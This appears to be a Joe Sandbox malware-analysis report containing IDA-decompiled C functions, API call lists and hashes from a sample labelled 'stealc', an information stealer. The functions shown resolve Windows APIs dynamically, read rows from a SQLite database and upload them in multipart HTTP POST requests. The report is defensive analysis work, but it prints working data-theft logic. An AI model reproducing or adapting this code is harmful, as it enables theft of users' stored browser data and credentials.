				_t14 =  *0x38367c; // 0x76b00000
				if(_t14 != 0) {
					 *0x3835bc = GetProcAddress(_t14,  *0x3830d8);
					 *0x383668 = GetProcAddress( *0x38367c,  *0x383244);
				}
				_t15 =  *0x383790; // 0x0
				if(_t15 != 0) {
					 *0x38371c = GetProcAddress(_t15,  *0x3831a0);
					 *0x383784 = GetProcAddress( *0x383790,  *0x383274);
				}
				_t16 =  *0x383628; // 0x0
				if(_t16 != 0) {
					 *0x383698 = GetProcAddress(_t16,  *0x38319c);
					 *0x383778 = GetProcAddress( *0x383628,  *0x383188);
					 *0x383690 = GetProcAddress( *0x383628,  *0x383180);
					 *0x383694 = GetProcAddress( *0x383628,  *0x38333c);
					 *0x383748 = GetProcAddress( *0x383628,  *0x3833b0);
					 *0x3837a8 = GetProcAddress( *0x383628,  *0x383394);
					 *0x3836b8 = GetProcAddress( *0x383628,  *0x3833b4);
					 *0x383640 = GetProcAddress( *0x383628,  *0x3834bc);
				}
				_t17 =  *0x3836a8; // 0x0
				if(_t17 != 0) {
					 *0x383754 = GetProcAddress(_t17,  *0x38310c);
					 *0x3835f4 = GetProcAddress( *0x3836a8,  *0x383474);
					 *0x383704 = GetProcAddress( *0x3836a8,  *0x383184);
					_t21 = GetProcAddress( *0x3836a8,  *0x383098);
					 *0x38365c = _t21;
					return _t21;
				}
				return _t17;
			}

0x0017e08e
0x0017e095
0x0017e0ae
0x0017e0c5
0x0017e0dc
0x0017e0f3
0x0017e10a
0x0017e121
0x0017e138
0x0017e14f
0x0017e166
0x0017e17d
0x0017e194
0x0017e1ab
0x0017e1c2
0x0017e1d9
0x0017e1f0
0x0017e207
0x0017e21e
0x0017e235
0x0017e24c
0x0017e263
0x0017e27a
0x0017e291
0x0017e2a8
0x0017e2bf
0x0017e2d6
0x0017e2ed
0x0017e304
0x0017e31b
0x0017e332
0x0017e349
0x0017e360
0x0017e377
0x0017e38e
0x0017e3a5
0x0017e3bc
0x0017e3d3
0x0017e3ea
0x0017e401
0x0017e418
0x0017e429
0x0017e429
0x0017e440
0x0017e451
0x0017e462
0x0017e473
0x0017e484
0x0017e48f
0x0017e494
0x0017e49b
0x0017e4b0
0x0017e4c7
0x0017e4de
0x0017e4f5
0x0017e506
0x0017e506
0x0017e50b
0x0017e512
0x0017e52b
0x0017e542
0x0017e559
0x0017e570
0x0017e587
0x0017e59e
0x0017e5b5
0x0017e5c6
0x0017e5c6
0x0017e5cb
0x0017e5d2
0x0017e5e7
0x0017e5fe
0x0017e615
0x0017e62c
0x0017e63d
0x0017e63d
0x0017e642
0x0017e649
0x0017e662
0x0017e679
0x0017e690
0x0017e6a7
0x0017e6be
0x0017e6cf
0x0017e6cf
0x0017e6d4
0x0017e6db
0x0017e6f4
0x0017e70b
0x0017e722
0x0017e739
0x0017e750
0x0017e767
0x0017e77e
0x0017e78f
0x0017e78f
0x0017e794
0x0017e79b
0x0017e7b0
0x0017e7c7
0x0017e7de
0x0017e7f5
0x0017e806
0x0017e806
0x0017e80b
0x0017e812
0x0017e827
0x0017e838
0x0017e838
0x0017e83d
0x0017e844
0x0017e859
0x0017e86a
0x0017e86a
0x0017e86f
0x0017e876
0x0017e88f
0x0017e8a6
0x0017e8bd
0x0017e8d4
0x0017e8eb
0x0017e902
0x0017e919
0x0017e92a
0x0017e92a
0x0017e92f
0x0017e936
0x0017e94b
0x0017e962
0x0017e979
0x0017e984
0x0017e98a
0x00000000
0x0017e98a
0x0017e98f

APIs

GetProcAddress.KERNEL32(76670000,0017C887), ref: 0017E0A2
GetProcAddress.KERNEL32 ref: 0017E0B9
GetProcAddress.KERNEL32 ref: 0017E0D0
GetProcAddress.KERNEL32 ref: 0017E0E7
GetProcAddress.KERNEL32 ref: 0017E0FE
GetProcAddress.KERNEL32 ref: 0017E115
GetProcAddress.KERNEL32 ref: 0017E12C
GetProcAddress.KERNEL32 ref: 0017E143
GetProcAddress.KERNEL32 ref: 0017E15A
GetProcAddress.KERNEL32 ref: 0017E171
GetProcAddress.KERNEL32 ref: 0017E188
GetProcAddress.KERNEL32 ref: 0017E19F
GetProcAddress.KERNEL32 ref: 0017E1B6
GetProcAddress.KERNEL32 ref: 0017E1CD
GetProcAddress.KERNEL32 ref: 0017E1E4
GetProcAddress.KERNEL32 ref: 0017E1FB
GetProcAddress.KERNEL32 ref: 0017E212
GetProcAddress.KERNEL32 ref: 0017E229
GetProcAddress.KERNEL32 ref: 0017E240
GetProcAddress.KERNEL32 ref: 0017E257
GetProcAddress.KERNEL32 ref: 0017E26E
GetProcAddress.KERNEL32 ref: 0017E285
GetProcAddress.KERNEL32 ref: 0017E29C
GetProcAddress.KERNEL32 ref: 0017E2B3
GetProcAddress.KERNEL32 ref: 0017E2CA
GetProcAddress.KERNEL32 ref: 0017E2E1
GetProcAddress.KERNEL32 ref: 0017E2F8
GetProcAddress.KERNEL32 ref: 0017E30F
GetProcAddress.KERNEL32 ref: 0017E326
GetProcAddress.KERNEL32 ref: 0017E33D
GetProcAddress.KERNEL32 ref: 0017E354
GetProcAddress.KERNEL32 ref: 0017E36B
GetProcAddress.KERNEL32 ref: 0017E382
GetProcAddress.KERNEL32 ref: 0017E399
GetProcAddress.KERNEL32 ref: 0017E3B0
GetProcAddress.KERNEL32 ref: 0017E3C7
GetProcAddress.KERNEL32 ref: 0017E3DE
GetProcAddress.KERNEL32 ref: 0017E3F5
GetProcAddress.KERNEL32 ref: 0017E40C
GetProcAddress.KERNEL32 ref: 0017E423
LoadLibraryA.KERNEL32(0017C887), ref: 0017E434
LoadLibraryA.KERNEL32 ref: 0017E445
LoadLibraryA.KERNEL32 ref: 0017E456
LoadLibraryA.KERNEL32 ref: 0017E467
LoadLibraryA.KERNEL32 ref: 0017E478
LoadLibraryA.KERNEL32 ref: 0017E489
GetProcAddress.KERNEL32(76130000), ref: 0017E4A4
GetProcAddress.KERNEL32 ref: 0017E4BB
GetProcAddress.KERNEL32 ref: 0017E4D2
GetProcAddress.KERNEL32 ref: 0017E4E9
GetProcAddress.KERNEL32 ref: 0017E500
GetProcAddress.KERNEL32(00000000), ref: 0017E51F
GetProcAddress.KERNEL32 ref: 0017E536
GetProcAddress.KERNEL32 ref: 0017E54D
GetProcAddress.KERNEL32 ref: 0017E564
GetProcAddress.KERNEL32 ref: 0017E57B
GetProcAddress.KERNEL32 ref: 0017E592
GetProcAddress.KERNEL32 ref: 0017E5A9
GetProcAddress.KERNEL32 ref: 0017E5C0
GetProcAddress.KERNEL32(00000000), ref: 0017E5DB
GetProcAddress.KERNEL32 ref: 0017E5F2
GetProcAddress.KERNEL32 ref: 0017E609
GetProcAddress.KERNEL32 ref: 0017E620
GetProcAddress.KERNEL32 ref: 0017E637
GetProcAddress.KERNEL32(00000000), ref: 0017E656
GetProcAddress.KERNEL32 ref: 0017E66D
GetProcAddress.KERNEL32 ref: 0017E684
GetProcAddress.KERNEL32 ref: 0017E69B
GetProcAddress.KERNEL32 ref: 0017E6B2
GetProcAddress.KERNEL32 ref: 0017E6C9
GetProcAddress.KERNEL32(762B0000), ref: 0017E6E8
GetProcAddress.KERNEL32 ref: 0017E6FF
GetProcAddress.KERNEL32 ref: 0017E716
GetProcAddress.KERNEL32 ref: 0017E72D
GetProcAddress.KERNEL32 ref: 0017E744
GetProcAddress.KERNEL32 ref: 0017E75B
GetProcAddress.KERNEL32 ref: 0017E772
GetProcAddress.KERNEL32 ref: 0017E789
GetProcAddress.KERNEL32(76170000), ref: 0017E7A4
GetProcAddress.KERNEL32 ref: 0017E7BB
GetProcAddress.KERNEL32 ref: 0017E7D2
GetProcAddress.KERNEL32 ref: 0017E7E9
GetProcAddress.KERNEL32 ref: 0017E800
GetProcAddress.KERNEL32(76B00000), ref: 0017E81B
GetProcAddress.KERNEL32 ref: 0017E832
GetProcAddress.KERNEL32(00000000), ref: 0017E84D
GetProcAddress.KERNEL32 ref: 0017E864
GetProcAddress.KERNEL32(00000000), ref: 0017E883
GetProcAddress.KERNEL32 ref: 0017E89A
GetProcAddress.KERNEL32 ref: 0017E8B1
GetProcAddress.KERNEL32 ref: 0017E8C8
GetProcAddress.KERNEL32 ref: 0017E8DF
GetProcAddress.KERNEL32 ref: 0017E8F6
GetProcAddress.KERNEL32 ref: 0017E90D
GetProcAddress.KERNEL32 ref: 0017E924
GetProcAddress.KERNEL32(00000000), ref: 0017E93F
GetProcAddress.KERNEL32 ref: 0017E956
GetProcAddress.KERNEL32 ref: 0017E96D
GetProcAddress.KERNEL32 ref: 0017E984

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 90c98587883c6742c9eb3d3a740a0c8cde9eccaf33adaa258b81b19d3519850c
Instruction ID: 194eac079cb6c7af4f333a909e06d872a3f10a1197c20115ebda12f0498497a9
Opcode Fuzzy Hash: 90c98587883c6742c9eb3d3a740a0c8cde9eccaf33adaa258b81b19d3519850c
Instruction Fuzzy Hash: 0332C1B5541341BFEB039F69ED989247FAEFB08F01B1455A9E90592330EB368B65EF00

Uniqueness

Uniqueness Score: -1.00%

Function 00173786 Relevance: 30.2, APIs: 13, Strings: 4, Instructions: 443
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00173786(void* __ecx, void* __eflags, intOrPtr _a4, char _a8, char _a20, intOrPtr _a88, intOrPtr _a100, intOrPtr _a104) {
				void* _v16;
				char _v28;
				char _v32;
				char _v36;
				int _v40;
				char _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				intOrPtr _v60;
				char _v72;
				char _v84;
				int _v96;
				char _v108;
				char _v120;
				char _v132;
				char _v144;
				intOrPtr _v160;
				intOrPtr _v180;
				intOrPtr _v188;
				intOrPtr _v200;
				void _v204;
				char _v264;
				char _v2264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t192;
				intOrPtr _t204;
				void* _t233;
				void* _t260;
				void* _t261;
				void* _t373;
				void* _t376;
				void* _t387;
				void* _t395;
				signed int _t403;
				void* _t408;
				void* _t409;
				signed int _t411;
				void* _t417;
				long _t435;
				void* _t507;
				void* _t508;
				void* _t509;
				void* _t512;

				_t518 = __eflags;
				_t509 = _t508 - 0xc;
				E0017E9C2( &_a8, __ecx, _t509, __eflags);
				_t192 = E001730F8();
				_t411 = 0xf;
				_t403 = 0;
				memcpy( &_v204, _t192, _t411 << 2);
				_v32 = 0;
				_v40 = 0;
				_v44 = 0;
				_v36 = 0;
				E0017D912(0,  &_v32,  &_v40, _a100, _a104);
				E0017D912(0,  &_v44,  &_v36, _a88,  *0x383658(_a88,  &_v264));
				_t512 = _t509 + 0x34;
				E0017E990(_a4, _t518, 0x17fbd9);
				E0017E990( &_v72, _t518, 0x17fbd9);
				E0017E990( &_v16, _t518, 0x17fbd9);
				E0017E990( &_v96, _t518, 0x17fbd9);
				E0017E990( &_v108, _t518, 0x17fbd9);
				_t204 =  *0x383694(0, 1, 0, 0, 0);
				_push( *0x3833a4);
				_v60 = _t204;
				_push(_v200);
				if( *0x383754() == 0) {
					_t403 = 1;
				}
				_t521 = _v60;
				if(_v60 != 0) {
					_t233 = E0017D78F(_t403,  &_v120, _t521, 0x14);
					_pop(_t417);
					E0017EA2F(E0017EA69( &_v72, _t417, _t233,  &_v132, _t521), _t417,  &_v72);
					E00171839(_v132);
					E00171839(_v120);
					E0017EA2F(E0017EAAB(E0017EA69(E0017EAAB( &_v96, _t417,  &_v144, _t521, "\r\n------"), _t417,  &_v72,  &_v132, _t521), _t417,  &_v120, _t521, "--\r\n"), _t417,  &_v96);
					E00171839(_v120);
					E00171839(_v132);
					E00171839(_v144);
					E0017EA2F(E0017EA69(E0017EAAB( &_v108, _t417,  &_v28, _t521,  *0x38306c), _t417,  &_v72,  &_v84, _t521), _t417,  &_v108);
					E00171839(_v84);
					E00171839(_v28);
					_t260 =  *0x383778(_v60, _v188, _v180, 0, 0, 3, 0, 0);
					_v56 = _t260;
					if(_t260 != 0) {
						asm("sbb ebx, ebx");
						_t261 =  *0x3837a8(_t260,  *0x3833c0, _v160,  *0x3831f8, 0, 0, ( ~_t403 & 0x00800000) + 0x400100, 0);
						_v52 = _t261;
						_t523 = _t261;
						if(_t261 != 0) {
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "------"), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EA69( &_v16, _t417,  &_v72,  &_v28, _t523), _t417,  &_v16);
							E00171839(_v28);
							_t407 = "\r\n";
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "\r\n"), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v84, _t523,  *0x38322c), _t417,  &_v16);
							E00171839(_v84);
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523,  *0x383398), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "\"\r\n\r\n"), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EA69( &_v16, _t417,  &_a20,  &_v28, _t523), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "\r\n"), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "------"), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EA69( &_v16, _t417,  &_v72,  &_v28, _t523), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "\r\n"), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v84, _t523,  *0x38322c), _t417,  &_v16);
							E00171839(_v84);
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523,  *0x383324), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "\"\r\n\r\n"), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, _v36), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, _t407), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "------"), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EA69( &_v16, _t417,  &_v72,  &_v28, _t523), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, _t407), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v84, _t523,  *0x38322c), _t417,  &_v16);
							E00171839(_v84);
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523,  *0x383034), _t417,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "\"\r\n\r\n"), _t417,  &_v16);
							E00171839(_v28);
							_t373 =  *0x383658(_v96);
							_t408 = _v16;
							_t435 = _t373 + _v32 +  *0x383658(_t408);
							_t376 = RtlAllocateHeap(GetProcessHeap(), 0, _t435);
							_v48 = _t376;
							memcpy(_v48, _t408,  *0x383658(_t408));
							memcpy(_v48 +  *0x383658(_v32), _t408, _v40);
							memcpy(_v48 +  *0x383658( *0x383658(_v96)) + _v32, _t408, _v96);
							_t387 =  *0x383658(_v108, _v48, _t435);
							_t409 = _v52;
							 *0x383748(_t409, _v108, _t387);
							_v52 =  &_v48;
							memset(_v52, 0, 4 << 0);
							_t512 = _t512 + 0x30;
							while(1) {
								_push( &_v52);
								_push(0x7cf);
								_push( &_v2264);
								_push(_t409);
								if( *0x3836b8() == 0) {
									break;
								}
								_t395 = _v52;
								__eflags = _t395;
								if(__eflags != 0) {
									 *((char*)(_t507 + _t395 - 0x8d4)) = 0;
									E0017EA2F(E0017EAAB(_a4, 0,  &_v144, __eflags,  &_v2264), 0, _a4);
									E00171839(_v144);
									continue;
								}
								break;
							}
							 *0x383690(_t409);
						}
						 *0x383690(_v56);
					}
				}
				 *0x383690(_v60);
				_v56 =  &_v40;
				memset(_v56, 0, 4 << 0);
				_v56 =  &_v36;
				memset(_v56, 0, 4 << 0);
				E00171839(_v72);
				E00171839(_v16);
				E00171839(_v96);
				E00171839(_v108);
				E00171839(0);
				E00171839(0);
				E00171839(0);
				E00171839(0);
				E001716AC( &_a8);
				E00171839(_a88);
				return _a4;
			}

0x00173786
0x00173792
0x0017379a
0x001737a6
0x001737ad
0x001737b6
0x001737be
0x001737c7
0x001737ca
0x001737cd
0x001737d0
0x001737d3
0x001737ee
0x001737f6
0x001737ff
0x00173808
0x00173811
0x0017381a
0x00173823
0x0017382e
0x00173834
0x0017383a
0x0017383d
0x0017384b
0x0017384d
0x0017384d
0x0017384e
0x00173852
0x0017385d
0x00173864
0x00173873
0x0017387b
0x00173883
0x001738b6
0x001738be
0x001738c6
0x001738d1
0x001738f2
0x001738fa
0x00173902
0x0017391e
0x00173924
0x00173929
0x00173932
0x00173956
0x0017395c
0x0017395f
0x00173961
0x0017397a
0x00173982
0x00173995
0x0017399d
0x001739a2
0x001739b6
0x001739be
0x001739d7
0x001739df
0x001739f8
0x00173a00
0x00173a18
0x00173a20
0x00173a36
0x00173a3e
0x00173a52
0x00173a5a
0x00173a72
0x00173a7a
0x00173a90
0x00173a98
0x00173aac
0x00173ab4
0x00173acd
0x00173ad5
0x00173aee
0x00173af6
0x00173b0e
0x00173b16
0x00173b2c
0x00173b34
0x00173b48
0x00173b50
0x00173b68
0x00173b70
0x00173b83
0x00173b8b
0x00173b9f
0x00173ba7
0x00173bc0
0x00173bc8
0x00173be1
0x00173be9
0x00173c01
0x00173c09
0x00173c11
0x00173c17
0x00173c26
0x00173c32
0x00173c39
0x00173c4d
0x00173c63
0x00173c83
0x00173c8f
0x00173c95
0x00173c9d
0x00173ca6
0x00173cb3
0x00173cb3
0x00173cf3
0x00173cf6
0x00173cf7
0x00173cfe
0x00173cff
0x00173d08
0x00000000
0x00000000
0x00173cbc
0x00173cbf
0x00173cc1
0x00173cc3
0x00173ce3
0x00173cee
0x00000000
0x00173cee
0x00000000
0x00173cc1
0x00173d0b
0x00173d0b
0x00173d14
0x00173d14
0x00173929
0x00173d1d
0x00173d26
0x00173d33
0x00173d38
0x00173d45
0x00173d4a
0x00173d52
0x00173d5a
0x00173d62
0x00173d69
0x00173d70
0x00173d77
0x00173d7e
0x00173d86
0x00173d8e
0x00173d9a

APIs

Part of subcall function 0017E9C2: lstrcpy.KERNEL32(00000000,?), ref: 0017E9E1

Part of subcall function 001730F8: malloc.MSVCRT ref: 0017312A
Part of subcall function 001730F8: malloc.MSVCRT ref: 00173130
Part of subcall function 001730F8: malloc.MSVCRT ref: 00173136
Part of subcall function 001730F8: lstrlen.KERNEL32(000000FF,00000000,?), ref: 00173148

lstrlen.KERNEL32(?), ref: 001737DF

Part of subcall function 0017D912: GetProcessHeap.KERNEL32(00000000,?,?,001737D8,?,?,?,?,?,?,?), ref: 0017D93F
Part of subcall function 0017D912: RtlAllocateHeap.NTDLL(00000000,?,001737D8), ref: 0017D946

Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6

Part of subcall function 0017EAAB: lstrlen.KERNEL32(?,?,?,0017D009,00181EC0,00000000,00181EC0,00000000,0017FBD9), ref: 0017EABF
Part of subcall function 0017EAAB: lstrcpy.KERNEL32(00000000,?), ref: 0017EAE7
Part of subcall function 0017EAAB: lstrcat.KERNEL32(?,00000000), ref: 0017EAF2

Part of subcall function 0017EA2F: lstrcpy.KERNEL32(00000000,?), ref: 0017EA5F

Part of subcall function 0017EA69: lstrcpy.KERNEL32(00000000,?), ref: 0017EA97
Part of subcall function 0017EA69: lstrcat.KERNEL32(?,00000000), ref: 0017EAA1

lstrlen.KERNEL32(?,",00181E44,------,00181E44,?,",00181E44,------,00181E44,",00181E44,------), ref: 00173C11
lstrlen.KERNEL32(?), ref: 00173C1D
GetProcessHeap.KERNEL32(00000000,?), ref: 00173C2B
RtlAllocateHeap.NTDLL(00000000), ref: 00173C32
lstrlen.KERNEL32(?), ref: 00173C3C
memcpy.MSVCRT ref: 00173C4D
lstrlen.KERNEL32(?,?,?), ref: 00173C59
memcpy.MSVCRT ref: 00173C63
lstrlen.KERNEL32(?), ref: 00173C6B
lstrlen.KERNEL32(?,?,00000000), ref: 00173C76
memcpy.MSVCRT ref: 00173C83
lstrlen.KERNEL32(?,?,?), ref: 00173C8F

Strings

------, xrefs: 00173967, 00173A5F, 00173B55
", xrefs: 00173A05, 00173AFB, 00173BEE
------, xrefs: 0017388D
--, xrefs: 00173888

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$Heap$mallocmemcpy$AllocateProcesslstrcat
String ID: ------$"$--$------
API String ID: 1086523722-1406108388
Opcode ID: 9aad13f7418c00f0aaf418ec9e7fddea7abc7da9d6e85e0d83ca1a00cf456dee
Instruction ID: f34ed61b7e3d60a4cde091b57983926fcabd4c455a868adcb3ae739ea8192b6e
Opcode Fuzzy Hash: 9aad13f7418c00f0aaf418ec9e7fddea7abc7da9d6e85e0d83ca1a00cf456dee
Instruction Fuzzy Hash: D302BA35D00219ABCF01FFA4EC469DDBBB9BF18304F5591A1B618B7161DB306E5ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 00175467 Relevance: 28.9, APIs: 19, Instructions: 351
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00175467(void* __ecx, void* __eflags, intOrPtr _a4, char _a16, char _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, char _a52) {
				void _v8;
				char _v12;
				char _v16;
				char _v28;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v88;
				char _v100;
				char _v112;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t128;
				void* _t149;
				char* _t153;
				void* _t185;
				void* _t189;
				void* _t190;
				void* _t191;
				void* _t212;
				void* _t214;
				void* _t216;
				void* _t231;
				intOrPtr* _t235;
				void* _t252;
				void* _t257;
				char* _t263;
				void* _t264;
				void* _t265;
				void* _t270;
				void* _t282;
				char* _t288;
				char* _t301;
				char* _t315;
				char* _t316;
				void* _t321;
				void* _t322;
				void* _t324;
				void* _t325;

				_t264 = __ecx;
				if(E0017EAFF( &_a28,  *0x38328c) != 0) {
					L2:
					E0017E9EB(_t264,  &_a16, 0x17fbd9);
					goto L4;
				} else {
					_t257 = E0017EAFF( &_a28,  *0x3832a4);
					_t329 = _t257;
					if(_t257 == 0) {
						__eflags = E0017EAFF( &_a16,  *0x38343c);
						if(__eflags == 0) {
							L4:
							E0017E990( &_v40, _t329, 0x17fbd9);
							E0017EA2F(E0017EAAB( &_v40, _t264,  &_v112, _t329,  *0x3833c8), _t264,  &_v40);
							E00171839(_v112);
							_t128 = E0017D78F(0x17fbd9,  &_v100, _t329, 0x1a);
							_pop(_t265);
							E0017EA2F(E0017EA69( &_v40, _t265, _t128,  &_v112, _t329), _t265,  &_v40);
							E00171839(_v112);
							E00171839(_v100);
							 *0x383610(_a4, _v40, 1);
							E0017E990( &_v28, _t329, 0x17fbd9);
							E0017EA2F(E0017EAAB( &_v28, _t265,  &_v112, _t329,  *0x3831b4), _t265,  &_v28);
							E00171839(_v112);
							E0017EA2F(E0017EAAB( &_v28, _t265,  &_v112, _t329, 0x17fbdc), _t265,  &_v28);
							E00171839(_v112);
							_t149 = E0017EA69( &_v28, _t265,  &_a28,  &_v112, _t329);
							_t301 =  &_v28;
							E0017EA2F(_t149, _t265, _t301);
							E00171839(_v112);
							_t153 = _t301;
							_t330 = _a48;
							if(_a48 == 0) {
								E0017EA2F(E0017EAAB(_t153, _t265,  &_v112, __eflags, "_"), _t265,  &_v28);
								E00171839(_v112);
								E0017EA2F(E0017EAAB(E0017EA69( &_v28, _t265,  &_a16,  &_v100, __eflags), _t265,  &_v112, __eflags,  *0x383238), _t265,  &_v28);
								E00171839(_v112);
							} else {
								E0017EA2F(E0017EAAB(_t153, _t265,  &_v100, _t330,  *0x383238), _t265,  &_v28);
							}
							E00171839(_v100);
							_push( &_v16);
							_push(_v40);
							if( *0x38359c() == 0) {
								_t185 =  *0x383558(_v16,  *0x383230, 0xffffffff,  &_v12, 0);
								_t322 = _t321 + 0x14;
								if(_t185 == 0) {
									_t189 = RtlAllocateHeap(GetProcessHeap(), 0, 0x5f5e0ff);
									_v8 = _t189;
									_t190 =  *0x383574(_v12);
									_pop(_t270);
									_t333 = _t190 - 0x64;
									if(_t190 == 0x64) {
										_t263 = "0";
										_t288 = "\t";
										do {
											E0017E990( &_v112, _t333,  *0x383590(_v12, 0));
											E0017E990( &_v64, _t333,  *0x383590(_v12, 1));
											E0017E990( &_v100, _t333,  *0x383590(_v12, 2));
											E0017E990( &_v52, _t333,  *0x383590(_v12, 3));
											E0017E990( &_v76, _t333,  *0x383590(_v12, 4));
											_t212 =  *0x383590(_v12, 5);
											_pop(_t282);
											E0017E990( &_v88, _t333, _t212);
											_t214 =  *0x383754(_v64, _t263);
											_t315 =  &_v64;
											if(_t214 != 0) {
												_push( *0x383048);
											} else {
												_push( *0x38331c);
											}
											E0017E9EB(_t282, _t315);
											_t216 =  *0x383754(_v52);
											_t316 =  &_v52;
											if(_t216 != 0) {
												_push( *0x383048);
											} else {
												_push( *0x38331c);
											}
											E0017E9EB(_t282, _t316);
											if( *_v76 == 0x2d) {
												E0017E9EB(_t282,  &_v76, _t263);
											}
											 *0x383730(_v8, _v112);
											 *0x383730(_v8, _t288);
											 *0x383730(_v8, _v64);
											 *0x383730(_v8, _t288);
											 *0x383730(_v8, _v100);
											 *0x383730(_v8, _t288);
											 *0x383730(_v8, _v52);
											 *0x383730(_v8, _t288);
											 *0x383730(_v8, _v76);
											 *0x383730(_v8, _t288);
											 *0x383730(_v8, _v88);
											 *0x383730(_v8, _t288);
											_t231 =  *0x383580(_v12, 6, _a40, _a44);
											_t235 = E00174E50(_t231,  &_v124,  *0x383588(), _v12, 6);
											_t322 = _t322 + 0x20;
											 *0x383730(_v8,  *_t235);
											E00171839(_v124);
											 *0x383730(_v8, "\n");
											E00171839(_v88);
											E00171839(_v76);
											E00171839(_v52);
											E00171839(_v100);
											E00171839(_v64);
											E00171839(_v112);
											_t252 =  *0x383574(_v12);
											_pop(_t270);
										} while (_t252 == 0x64);
									}
									_t191 =  *0x383658(_v8);
									_t338 = _t191 - 5;
									if(_t191 > 5) {
										_push( *0x383658(_v8));
										_push(_v8);
										_t324 = _t322 - 0xc;
										E0017E9C2( &_v28, _t270, _t324, _t338);
										_t325 = _t324 - 0x50;
										E001716CB( &_a52, _t325);
										_push( &_v124);
										E00173786(_t270, _t338);
										_t322 = _t325 + 0x68;
										E00171839(_v124);
									}
									memset( &_v8, 0, 4);
								}
								 *0x383578(_v12);
								 *0x3835a0(_v16);
							}
							 *0x383664(_v40);
							E00171839(_v40);
							E00171839(_v28);
							E00171839(0);
							E00171839(0);
						}
					} else {
						goto L2;
					}
				}
				E00171839(_a4);
				E00171839(_a16);
				E00171839(_a28);
				return E001716AC( &_a52);
			}

0x00175467
0x00175485
0x00175499
0x0017549d
0x00000000
0x00175487
0x00175490
0x00175495
0x00175497
0x001754b2
0x001754b4
0x001754ba
0x001754be
0x001754d7
0x001754df
0x001754e9
0x001754f0
0x001754ff
0x00175507
0x0017550f
0x0017551c
0x00175526
0x00175541
0x00175549
0x00175561
0x00175569
0x00175577
0x0017557c
0x0017557f
0x00175587
0x0017558c
0x0017558e
0x00175591
0x001755bb
0x001755c3
0x001755e7
0x001755ef
0x00175593
0x001755a4
0x001755a4
0x001755f7
0x001755ff
0x00175600
0x0017560d
0x00175623
0x00175629
0x0017562e
0x00175641
0x0017564a
0x0017564d
0x00175653
0x00175654
0x00175657
0x0017565d
0x00175662
0x00175667
0x00175678
0x0017568e
0x001756a4
0x001756ba
0x001756d0
0x001756da
0x001756e1
0x001756e6
0x001756ef
0x001756f5
0x001756fa
0x00175704
0x001756fc
0x001756fc
0x001756fc
0x0017570a
0x00175713
0x00175719
0x0017571e
0x00175728
0x00175720
0x00175720
0x00175720
0x0017572e
0x00175739
0x0017573f
0x0017573f
0x0017574a
0x00175754
0x00175760
0x0017576a
0x00175776
0x00175780
0x0017578c
0x00175796
0x001757a2
0x001757ac
0x001757b8
0x001757c2
0x001757d3
0x001757f0
0x001757f5
0x001757fd
0x00175806
0x00175813
